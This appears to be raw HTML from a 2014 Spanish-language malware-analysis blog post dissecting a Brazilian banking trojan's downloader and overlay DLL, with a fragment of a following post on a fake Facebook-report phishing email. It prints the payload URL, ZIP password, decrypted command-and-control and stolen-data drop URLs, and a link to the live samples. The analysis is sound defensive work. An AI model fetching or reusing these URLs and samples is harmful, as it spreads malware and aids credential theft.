004A0BBC <ansistring> '\\'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0C88 <pansichar> ''</pansichar></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DBC <ansistring> '\\Adobe.zip'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DD0 <ansistring> '\\Runner.exe'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DE4 <ansistring> '\\borlndmm.dll'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0DFC <ansistring> 'http://greatsteppes.com/1/images/winrt.jpg'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">El downloader descarga un archivo del tipo jpg, que en realidad se trata de un ZIP con password.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAY5psRdURW9yJqgRHSHdkXlCd1DyA97xcIpkwgBovAYOmqIPGkS8nTPo6Y0Zktsz4cGteYc878X6aYBKuwzaH0oKtnDIy5V4V9RmKfxOk-cFZU14E8LWdAxQCb9Qp1telPQDJZ9l_hp0/s1600/03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAY5psRdURW9yJqgRHSHdkXlCd1DyA97xcIpkwgBovAYOmqIPGkS8nTPo6Y0Zktsz4cGteYc878X6aYBKuwzaH0oKtnDIy5V4V9RmKfxOk-cFZU14E8LWdAxQCb9Qp1telPQDJZ9l_hp0/s1600/03.jpg" height="277" width="400" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Archivo ZIP</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> 004A0DFC <ansistring> 'http://greatsteppes.com/1/images/winrt.jpg'</ansistring></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Password </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> 004A0B94 <ansistring> 'sejafeliz02'</ansistring></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-HShEnjodMwC86DhcEMCIrYy1WxCzteGrWyN3Q4ABpFx5NS1-bC7xMFJFpX2t9dFoktU3DiGLVkuqS7enr-CPoRuFeJOYMVyYQZ0WUxc6R1jve5MNI3sxW5ch2mUSMDwIoSnDdVgGyVQ/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-HShEnjodMwC86DhcEMCIrYy1WxCzteGrWyN3Q4ABpFx5NS1-bC7xMFJFpX2t9dFoktU3DiGLVkuqS7enr-CPoRuFeJOYMVyYQZ0WUxc6R1jve5MNI3sxW5ch2mUSMDwIoSnDdVgGyVQ/s1600/04.jpg" height="153" width="320" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Analizamos el runner.exe y gbsite.dll que son cargan maliciosas en particular esta ultima.</span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iyXLp8TvJWV9DKI3IooB2CtfCcyfVTN3iadUYO9UhC6FOVpDyji6iTmTjXVR8rUA8yEhBlxhhfHWacD_rPKBRnuQA2DLHgyvKWj8n2a9F5MVDYKq3LP7NjBXU4IcWQfIgd6EDbX3RBQ/s1600/vt02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1iyXLp8TvJWV9DKI3IooB2CtfCcyfVTN3iadUYO9UhC6FOVpDyji6iTmTjXVR8rUA8yEhBlxhhfHWacD_rPKBRnuQA2DLHgyvKWj8n2a9F5MVDYKq3LP7NjBXU4IcWQfIgd6EDbX3RBQ/s1600/vt02.jpg" height="142" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHf_QX8yUZzUP4NPwlWyu29iTj4-UtYl9iMPOQrUgBIFxKtPTD0HNlrYGeI0ZzkPQGM9-3XJJGhBO3hHAbdFqIDdJ-GWc2uQZVwLa8cQ4cwtKY_kDb-oh3DWlHfDEbGdNlORHHw2mFKAI/s1600/vt03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHf_QX8yUZzUP4NPwlWyu29iTj4-UtYl9iMPOQrUgBIFxKtPTD0HNlrYGeI0ZzkPQGM9-3XJJGhBO3hHAbdFqIDdJ-GWc2uQZVwLa8cQ4cwtKY_kDb-oh3DWlHfDEbGdNlORHHw2mFKAI/s1600/vt03.jpg" height="190" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analizando el DLL se pueden observar que se trata de un screen overlay viendo sus formularios.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=4220472203730425546" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYckojnRYKji3TKdIbEi1GTWMwg3HoKjBqsMrKm9iTsnPOvAG5fsgzAdB-9EIoB5AC_WRVj6h_iPC0fI9MQb_gb1J5_5kQGHzvs9pM3Eqkmsn3RVXJ6fHZVivmym6iuZ6REGQYy4sBZrg/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYckojnRYKji3TKdIbEi1GTWMwg3HoKjBqsMrKm9iTsnPOvAG5fsgzAdB-9EIoB5AC_WRVj6h_iPC0fI9MQb_gb1J5_5kQGHzvs9pM3Eqkmsn3RVXJ6fHZVivmym6iuZ6REGQYy4sBZrg/s1600/01.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzwrsa_Jz3W69E0nBND7eTTo0dETr-XMU0zQE4IgH0r6h5ASk3aklNe0hSWarwrmyyWXdVoJ90beOtDVo9j8jyU7dY5qdZOATB5Ygm4NOuuyrdkbUqKCeFW3VTJIgntVdKxHtnAFxTUis/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzwrsa_Jz3W69E0nBND7eTTo0dETr-XMU0zQE4IgH0r6h5ASk3aklNe0hSWarwrmyyWXdVoJ90beOtDVo9j8jyU7dY5qdZOATB5Ygm4NOuuyrdkbUqKCeFW3VTJIgntVdKxHtnAFxTUis/s1600/02.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9TgAMjE_XMXIRL8RGFiR81tzDvVTNC30-3p9PSmWvqhqR-3iyM77IApNkEwd_jHSCMgQsbHWlDzs3PAHPH-nadDGkfXUBpfTxsxQIRPTzmdmG6BZ5bgy3KSeImG3qhQ-WLDX0dfQFDlU/s1600/04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9TgAMjE_XMXIRL8RGFiR81tzDvVTNC30-3p9PSmWvqhqR-3iyM77IApNkEwd_jHSCMgQsbHWlDzs3PAHPH-nadDGkfXUBpfTxsxQIRPTzmdmG6BZ5bgy3KSeImG3qhQ-WLDX0dfQFDlU/s1600/04.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaLGJFF8Kqcu9cCQIcd1VbvjHG-ICXntyb0SVtX8XHzqiBFPyl9SBaQFIM-cMTWuqqkZpVOCKw3vyLhXb3IHYGwL3_akqhQfBQCG3QgO8GLvm2Rabk4G1GxtHe0Ari8q-JU6Pz23qsx7E/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaLGJFF8Kqcu9cCQIcd1VbvjHG-ICXntyb0SVtX8XHzqiBFPyl9SBaQFIM-cMTWuqqkZpVOCKw3vyLhXb3IHYGwL3_akqhQfBQCG3QgO8GLvm2Rabk4G1GxtHe0Ari8q-JU6Pz23qsx7E/s1600/05.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXJPYI1JMjT1d-ZVYYthTsbBRtEHrYoYJwwyPtpnc6Vz46ZFjFYQXkANN136LKu_XJoNnNmZvzJxEGvCDHDA9sJFIXeXbQSLKn-ZxjmIQ4oOxG07SLGRny70i4U0NyOW3HGzOyBN3nu6s/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXJPYI1JMjT1d-ZVYYthTsbBRtEHrYoYJwwyPtpnc6Vz46ZFjFYQXkANN136LKu_XJoNnNmZvzJxEGvCDHDA9sJFIXeXbQSLKn-ZxjmIQ4oOxG07SLGRny70i4U0NyOW3HGzOyBN3nu6s/s1600/06.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjscLWHWSgpRTo_oXplUHZ8VLjdBmpaWGzIdJVwNBkcrfG70sfucmQf4_gfPo-eDD3iTKUszY1Mj2bAZdz9bu0Cly30_ZGoF1EOhB2z7-Brg65VU_NOUFIsCkid4xDc1PF4rKSelQF7Gro/s1600/07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjscLWHWSgpRTo_oXplUHZ8VLjdBmpaWGzIdJVwNBkcrfG70sfucmQf4_gfPo-eDD3iTKUszY1Mj2bAZdz9bu0Cly30_ZGoF1EOhB2z7-Brg65VU_NOUFIsCkid4xDc1PF4rKSelQF7Gro/s1600/07.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5GnCS1IHoZM3O9VVbzisuQbP4c0Z1NZ9GP2ullcSYOBvFX6qrJ2d864oiYxCpcF5U9mqvc3v95-7JBmAFo6zR8wLFC8cpk3zOCB6z5V46nUjz6JW-HQKWEAEOH9UT2tLJhZbtFNvnCs0/s1600/08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5GnCS1IHoZM3O9VVbzisuQbP4c0Z1NZ9GP2ullcSYOBvFX6qrJ2d864oiYxCpcF5U9mqvc3v95-7JBmAFo6zR8wLFC8cpk3zOCB6z5V46nUjz6JW-HQKWEAEOH9UT2tLJhZbtFNvnCs0/s1600/08.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirEwBslq64-WGSHxyFW6AX64Q2lD3V9J0v-qCjqAm7yuYytx4GuY4sbMwWxjot_CobeWz_gO6nDIwlUp6KTQA9PQJA1PctxjxcQnDfbQxcnX57L0n8gBQ9hN7u0YwVEXrxTJDDosneAY4/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirEwBslq64-WGSHxyFW6AX64Q2lD3V9J0v-qCjqAm7yuYytx4GuY4sbMwWxjot_CobeWz_gO6nDIwlUp6KTQA9PQJA1PctxjxcQnDfbQxcnX57L0n8gBQ9hN7u0YwVEXrxTJDDosneAY4/s1600/09.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghHpn0e_ou7rvce3k65L6sQAXxIntzI-bgGAzUKQ1iQvd9cF7O5wKvEGOrf2zh4aKE0e73mzwRNvEdqfnDNarQY4eW4GIxj5X40QKJLI8rBtTceR0t_zgQRi4RrwVdnaYfuNH1WX3nu-A/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghHpn0e_ou7rvce3k65L6sQAXxIntzI-bgGAzUKQ1iQvd9cF7O5wKvEGOrf2zh4aKE0e73mzwRNvEdqfnDNarQY4eW4GIxj5X40QKJLI8rBtTceR0t_zgQRi4RrwVdnaYfuNH1WX3nu-A/s1600/10.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0t4GSwtt5IPIogP1-uZ0RZ06YXQ7o3A9pBMQQBHXx-bmlVWBtTxssVjcmTnlDJkRFWRDC9X1_ZfO2sLrmNt1nCSBiKEBItPQiD4i2fB_I4A5gZSSTQeVM02iAtt5Oug8qArEtnJ0B5dc/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0t4GSwtt5IPIogP1-uZ0RZ06YXQ7o3A9pBMQQBHXx-bmlVWBtTxssVjcmTnlDJkRFWRDC9X1_ZfO2sLrmNt1nCSBiKEBItPQiD4i2fB_I4A5gZSSTQeVM02iAtt5Oug8qArEtnJ0B5dc/s1600/11.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfcNJgyzlWI8scRH3NqaVCAzNP6NsuKkMXEJ7p6dplPQGns7VlLp3-NeyJ1SbVy4gkxzfhHLF8id-dAUPG7kJnRf366hhPMzlb3mxfaiDJshIYwAy3T17TAFvEBcGsqMiJ7_Z2wmoiazA/s1600/12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfcNJgyzlWI8scRH3NqaVCAzNP6NsuKkMXEJ7p6dplPQGns7VlLp3-NeyJ1SbVy4gkxzfhHLF8id-dAUPG7kJnRf366hhPMzlb3mxfaiDJshIYwAy3T17TAFvEBcGsqMiJ7_Z2wmoiazA/s1600/12.jpg" height="279" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh04E2N5Ggi9T-JHWquOBfPr_J2Y-jc1t9rCOePXqSqO1bWgakVUyiatFvZ3xAoA1f0tp3xBVTR7OgvEa_pRM8L-35aHuQdQpXBFYyvHFDPbIkYEp3XMGuTDxA04Ixhej1AESx3C6ucQ_w/s1600/14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh04E2N5Ggi9T-JHWquOBfPr_J2Y-jc1t9rCOePXqSqO1bWgakVUyiatFvZ3xAoA1f0tp3xBVTR7OgvEa_pRM8L-35aHuQdQpXBFYyvHFDPbIkYEp3XMGuTDxA04Ixhej1AESx3C6ucQ_w/s1600/14.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_xWsR4XaHHXy3iZlfjVmwg1TygWi2lLulTUGIuHofBR8j28-HHXn9a5Y_8J7MHiR3DZyMcqT7SEHaBgJnIuQWGy40H_ebb7X45yrpjIQKSSckMzbzMmaDaW-mItWaJ6ON6igBAh4TV2Y/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_xWsR4XaHHXy3iZlfjVmwg1TygWi2lLulTUGIuHofBR8j28-HHXn9a5Y_8J7MHiR3DZyMcqT7SEHaBgJnIuQWGy40H_ebb7X45yrpjIQKSSckMzbzMmaDaW-mItWaJ6ON6igBAh4TV2Y/s1600/15.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsKImt8CNKero0rgb4lurqBYOQwdo-CJYOp7ziWOE-FEgxTY7jvJtTRpGLoK84c3Y64eUWVl-e1aMBx0faDi5UP7liK7kPHGm1NslO8RZvei4a946CPBWl4w8wEwRphi94VriFYnYP-Z0/s1600/17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsKImt8CNKero0rgb4lurqBYOQwdo-CJYOp7ziWOE-FEgxTY7jvJtTRpGLoK84c3Y64eUWVl-e1aMBx0faDi5UP7liK7kPHGm1NslO8RZvei4a946CPBWl4w8wEwRphi94VriFYnYP-Z0/s1600/17.jpg" height="280" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSJXRgaTM1Yy_WhEskeES9SDCELFrGyC3KIy3gFXq6v_XdEnealgU5wkNnOdCtSkx7Hg3N1q6oD1rHUbYFd4P91cv7UVIJlmO2Fw5pWNu9cLH_ibNxlKqkUA8QuKiHALlthRY03inN2Y/s1600/18.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzSJXRgaTM1Yy_WhEskeES9SDCELFrGyC3KIy3gFXq6v_XdEnealgU5wkNnOdCtSkx7Hg3N1q6oD1rHUbYFd4P91cv7UVIJlmO2Fw5pWNu9cLH_ibNxlKqkUA8QuKiHALlthRY03inN2Y/s1600/18.jpg" height="280" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWK30gGN8L36b1Fr_ha8MA-9BSeHAbSJJCZxmULHq_ce6RD-6hG-6-gpegehFD5SZNksP0Zm1MdKxSsm9indbTdhBmVpnb2HvCU2x1AiSJ5MPE5Oo1b6kCffC-A_K_qtuKHGZdu17k6M/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMWK30gGN8L36b1Fr_ha8MA-9BSeHAbSJJCZxmULHq_ce6RD-6hG-6-gpegehFD5SZNksP0Zm1MdKxSsm9indbTdhBmVpnb2HvCU2x1AiSJ5MPE5Oo1b6kCffC-A_K_qtuKHGZdu17k6M/s1600/3.png" height="280" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Datos Ofuscados.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00A56C34 <ustring> 'A948E60138382B1833D80D55FA31F229BD1425DE45E919C2D5698FBC74F222DA74EE6EEF02'</ustring></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Se desencriptan como:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">http://bandaluxuria.net/blog/upa.inf</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">En esta url se encuentra un archivo de configuracion del troyano</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">contienen estos datos ofuscados.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">2903</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">2903</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">2903</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">DA19D716CF4023103CD30951FA7FA64A90DA17DB19DC1031B2B142F60C200422DC4093C5618AAD0521BF77DF7DC6D46D80BB7997413CE811C979FB3931F51CAF</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0634F23DE455C8B55E89B6033EE60FC60B53E4016790568C9F46F1161529D20927DC7290EA18D263</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">D456D755</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Que corresponden a:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">0</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">http://ecole.saintlumine.free.fr/ecolesaintlu/images/notify.php</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">http://agsportualit.com/web/config1.txt</span></b></div>
<div class="separator" style="clear: both;">
<b><span style="font-family: Arial, Helvetica, sans-serif; font-size: x-small;">777</span></b></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Desencriptor programado por mi para realizar esta tarea.</span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7KW03BR7T3V6sowLYIu2VrgWVESccqawWTWJXCD9-iGGZsi2GPFs4S-EDTIU1KcGGG1hjYTslHmm6fLXHSTglOR4IPzFkmflKJsx2AQ2EVOf49kINCRPCjyz-9X684oVPA0ndM0wBmY/s1600/desc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU7KW03BR7T3V6sowLYIu2VrgWVESccqawWTWJXCD9-iGGZsi2GPFs4S-EDTIU1KcGGG1hjYTslHmm6fLXHSTglOR4IPzFkmflKJsx2AQ2EVOf49kINCRPCjyz-9X684oVPA0ndM0wBmY/s1600/desc.jpg" height="233" width="320" /></a></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">El PHP es donde se dirigen los datos robados.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Muestras: https://www.dropbox.com/s/3vj3igmnfuvn1lf/Intimacao%20de%20n.%209743872-malware-27-11-14.rar?dl=0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<br /></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
<div class="separator" style="clear: both; font-family: 'Times New Roman'; font-size: medium;">
<br /></div>
</div>
</span></div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-90932150809805196652014-11-13T07:15:00.002-08:002014-11-13T07:15:39.425-08:00<span style="font-family: Arial, Helvetica, sans-serif;"><b>Falsa denuncia de Imagen en Facebook.</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Ayer se despacharon con una supuesta imagen que fue denunciada por inapropiada en Facebook.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">El texto esta en portugués por lo que seguramente se trate, como en otras oportunidades, de un downloader de un troyano bancario brasileño.</span><br />
<br />
<h2 class="rmSubject" style="color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; font-size: 21px; font-weight: normal; line-height: 29.9904003143311px; margin: 0px 0px 13px; padding-top: 2px; text-align: center;">
Fw: Uma imagem postada em sua linha do tempo foi denunciada!</h2>
<div>
